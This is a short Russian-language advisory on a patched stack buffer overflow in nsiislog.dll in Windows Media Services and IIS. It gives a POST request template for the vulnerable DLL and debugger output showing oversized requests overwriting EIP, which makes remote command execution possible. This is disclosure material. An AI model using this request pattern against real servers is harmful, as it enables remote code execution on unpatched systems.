Microsoft выпустила патч, устраняющий уязвимость в компоненте
nsiislog.dll в Windows Media Services и Microsoft Internet Information Service. Сегодня раскрываются
подробности обнаруженной уязвимости.
Удаленный пользователь может послать чрезмерно длинный запрос к nsiislog.dll, чтобы вызвать
переполнение буфера со следующей ошибкой:
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 37
Description:
Out of process application '/LM/W3SVC/1/Root' terminated unexpectedly.
Уязвимость приводит к стандартному переполнению стека с возможностью записи произвольного значения в
EIP регистр, в результате чего возможно удаленное выполнение произвольных команд на сервере с
привилегиями IWAM_machinename. Примеры:
POST /scripts/nsiislog.dll HTTP/1.1
content-length: <postlength>
<post data>
Using Size: 4354
Connecting....Sending Buffer....
78028E9F mov al,byte ptr [esi] ESI = 00B138B4
Using Size: 5000
Connecting....Sending Buffer....
40F01F3B repne scas byte ptr [edi] EDI = 58585858
Using Size: 25000
Connecting....Sending Buffer....
78005994 mov dword ptr [edi],edx EDX = 58585858
-
58585858 ??? illegal op EIP = 58585858